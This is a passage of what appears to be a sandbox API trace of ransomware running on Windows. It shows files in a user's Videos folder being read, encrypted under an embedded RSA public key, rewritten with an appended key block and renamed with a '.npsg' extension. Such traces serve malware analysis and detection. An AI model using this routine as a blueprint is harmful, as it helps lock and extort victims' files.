(lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.542] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.542] CloseHandle (hObject=0x644) returned 1 [0238.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.544] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\4_j2A_i5bsYCdo_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\4_j2a_i5bsycdo_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\4_j2A_i5bsYCdo_.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\4_j2a_i5bsycdo_.avi.npsg")) returned 1 [0238.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.545] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.547] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8196fb0, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xf2535860, ftLastAccessTime.dwHighDateTime=0x1d5baab, ftLastWriteTime.dwLowDateTime=0xf2535860, ftLastWriteTime.dwHighDateTime=0x1d5baab, nFileSizeHigh=0x0, nFileSizeLow=0x787f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kENlfga.avi", cAlternateFileName="")) returned 1 [0238.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.547] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\kENlfga.avi") returned=".avi" [0238.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\kENlfga.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\kenlfga.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.556] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=30847) returned 1 [0238.556] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.559] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7859, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.559] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.561] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.561] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x787f, lpOverlapped=0x0) returned 1 [0238.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.562] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.564] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.564] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.564] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.564] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.564] GetLastError () returned 0x0 [0238.564] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.564] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.564] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.564] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.564] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7880) returned 0x3b95d50 [0238.565] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85f28 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400aa0 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85f70 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ab8 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ae8 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b00 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.565] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b00 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400ae8 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.567] GetCurrentThreadId () returned 0x5b4 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87048 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.567] GetCurrentThreadId () returned 0x5b4 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ae8 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b00 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ad0 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b60 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b18 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b78 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b18 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b18 [0238.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ae8 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b18 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ad0 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ab8 | out: hHeap=0x620000) returned 1 [0238.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85f70 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.572] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x787a, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x787a, lpOverlapped=0x0) returned 1 [0238.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.573] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x787f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.573] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 